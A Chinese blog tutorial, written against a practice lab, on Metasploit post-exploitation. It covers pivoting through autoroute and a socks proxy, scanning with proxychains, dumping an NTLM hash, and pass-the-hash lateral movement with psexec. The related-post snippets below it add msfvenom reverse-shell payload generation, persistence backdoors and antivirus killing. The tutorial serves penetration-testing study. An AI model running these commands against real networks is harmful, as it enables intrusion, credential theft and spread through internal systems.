metasploit后渗透之进阶知识

已于 2022-02-02 13:14:06 修改
阅读量2.2k 收藏 8
点赞数 1
分类专栏: metasploit 文章标签: 安全 web安全 kali linux 渗透测试
于 2022-02-01 09:56:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122762880
版权

文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

MSF后渗透之进阶知识

获取信息

当我们获取了一个shell后,通常会遇到跨路由访问,这个时候我们就需要使用MSF来建立路由以及socks连接搭建隧道以便于我们的通信:
从这里看出是有两张网卡的:
在这里插入图片描述
虽然在我们的MSF中是可以对这个内网10段进行访问的,但我们在外面是并不能进行访问的:
在这里插入图片描述
在这里插入图片描述

建立路由

所以为了让外面也能同样进行访问,便于我们的渗透测试,所以需要建立路由,然后建立socks通道利用工具来进行代理访问:

run get_local_subnets #获取网卡信息
run autoroute -s 10.10.10.0/24 #添加路由10段
run autoroute -p #查看路由情况

在这里插入图片描述

隧道建立

建立socks5隧道:

search socks #查看socks 模块
use auxiliary/server/socks_proxy #切换到这个模块

这里的信息,VERSION SRVHOST不需要修改,SRVPORT如果修改,那么在隧道文件中也需要随之进行修改,可使用默认1080端口
在这里插入图片描述
修改隧道文件:

vim /etc/proxychains4.conf

在这里插入图片描述
使用proxychains4工具来代理:

proxychains4 nmap 10.10.10.138 -sT -Pn -A -p 445

在这里插入图片描述

内网横向

这样我们就可以从外面访问到10.10.10.138
当我们在跳板机上通过hashdump查到了hash,我们就可以利用psexec这个模块来进行攻击,来探测密码是否一致,如果一致,那么我们就可以扩大了内网控制权,实现内网横向:
首先获取hash:

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b:::

在这里插入图片描述
然后使用模块进行攻击:
这里必须使用正向连接:

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp #正向连接
set RHOST 10.10.10.138 #被攻击机地址
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b 
show options #查看信息

在这里插入图片描述
虽然我们已经建立了路由,但并没有在msf中设置全局代理,所以是无法攻击成功的。

setg Proxies socks5:192.168.1.6:1080 #设置全局代理
set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。

成功反弹:
在这里插入图片描述

当如果有多网段,那么我们也同样可以通过添加路由的方式,来进行访问。

全局变量Global
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
MSF渗透
wo41ge的博客
11-24 3691
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
msf渗透
舞动的獾
07-19 3346
主要内容 首先构造一个payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe 已经找到一台机器执行了我的payload 进一步获取更高的权限。 获取system权限 load priv getsystems 执行出现超时 先返回msf,保留session
MSF渗透操作
weixin_51583379的博客
11-03 1525
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}
msf渗透(Meterpreter命令)
2302_76986722的博客
09-17 442
6 ,获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用。filenname,path这两个也可以进行设置,比如名字改成qq.exe,就会qq在提权,更容易上。
关于Metasploit Framework与渗透测试相关知识
12-28
在这个过程中,Metasploit Framework扮演着核心工具的角色,它为安全专家提供了大量的漏洞利用代码、扫描器、后渗透工具,以及一个强大的交互式环境,帮助测试者有效地执行测试任务。 **一、Metasploit Framework...
渗透Metasploit Framework基础知识
12-28
Metasploit Framework基础知识
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
成功渗透后,Metasploit提供了一系列后渗透工具,如Meterpreter,它是一个功能强大的远程控制外壳,支持多种操作,如文件操作、进程控制、键盘记录等。这些工具可以帮助测试者进一步探索目标系统,收集敏感信息,...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf ... 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf 渗透测试-认识Metesploit2.pdf 渗透测试1.pdf
Metasploit渗透测试指南 修订版
09-21
它提供了一个集成的环境,用于开发、执行和管理攻击向量,包括exploits(利用代码)、payloads(有效负载)和post-exploitation(后渗透)工具。该框架使得安全专家能够有效地利用公开的漏洞信息,模拟黑客攻击,以...
渗透工具MSF系列培训教程(共17课)10-17课
06-20
第1课:什么是Metasploit 第2课:如何安装Metasploit 第3课:如何更新MSF及其结构 第4课:msf用户接口及核心命令 第5课:Exploits模块 第6课:payloads模块 第7课:利用MSF攻击windows 第8课:三个模块作用 第9课:msfcli命令接口 第10课:msfweb命令接口 第11课:msfd命令接口 第12课:msfpayload和msfencode接口 第13课:MSF数据库后台命令 第14课:autopwn命令 第15课:meterpreter plyload 第16课:vncinject payload 第17课:MSF实战应用演示
MSF渗透攻击
weixin_43749601的博客
03-06 1710
进程迁移 刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机中的一个稳定的进程绑定在一块。 1.ps命令获取目标机正在运行的进程。 2.getpid获得shell的进程号(PID) 3.通过进程号得知该shell的进程名。 4.输入migrate + 被绑定进程的PID 5.再次输出getpid,发现进程号已经变成需要迁移的进程号,进程迁移成功 系统命令 shell连接稳定之后,开始收集系统信息 1.sysinfo命令查看目标机的系统信息 2.rou
msf之后渗透(笔记)
p_utao的博客
09-14 2440
渗透攻击:信息收集 Metasploit提供了一个强大的后渗透工具——Meterpreter后期渗透模块有200多个。 Meterpreter优势: - 纯内存工作模式,不需要对磁盘进行任何写入操作 - 使用加密通信协议,可以同时与几个信道通信 - 在被攻击进程内工作,不需要创建新的进程 - 易于在多进程之间迁移 - 平台通用 进程迁移 获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透
超实用!手把手教你如何用MSF进行后渗透测试
dianyan5615的博客
06-15 1068
  在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升;后续需要对系统进行全面的分析,搞清楚系统的用途;如果目标处于一个内网环境中,那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试,更全面地挖掘系统中存在的安全隐患。   本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用MSF进...
MSF渗透模块Meterpreter
LainWith的博客
01-27 4281
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
Kali利用msf渗透Windows电脑(超详细)
最新发布
jennycisp的博客
02-27 2586
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
Msf渗透测试阶段
分享学习网络的点点滴滴
01-09 396
● 已经获得目标系统控制权后扩大战果○ 提权○ 信息收集○ 渗透内网○ 永久后门● 基于已有session扩大战果。
渗透测试Metasploit框架体验(5.理解MSF渗透-之提权)
weixin_51803729的博客
02-12 5230
渗透测试Metasploit框架体验(5.理解MSF渗透-之提权)
msf渗透命令和后渗透攻击
weixin_46079186的博客
11-17 1976
msf 常用命令 1. msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=本机ip LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o 文件名.exe 生成木马 2. msfconsole 3. use exploit/multi/handler 利用模块 4. show targets 查看这
metasploit渗透攻击:后门
06-02
Metasploit是一款流行的渗透测试工具,可用于发现系统漏洞、攻击目标系统并获取系统权限。后门是一种常见的攻击手段,它可让黑客在未来再次访问受害者系统而不被发现。使用Metasploit创建后门非常简单,只需要执行以下步骤: 1. 使用Metasploit的exploit模块攻击目标系统,获取系统权限。 2. 利用Metasploit的post模块创建后门,例如使用“post/windows/manage/migrate”模块将后门进程迁移到其他进程中。 3. 确保后门能够在系统启动时自动运行,例如使用“run persistence”命令创建持久化后门。 4. 隐藏后门进程,例如使用“run killav”命令杀死杀毒软件进程,以免被杀毒软件发现。 5. 等待受害者再次连接后门并获取系统权限。 注意:上述操作仅用于合法的渗透测试安全审计,任何未经授权的攻击行为都是非法的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值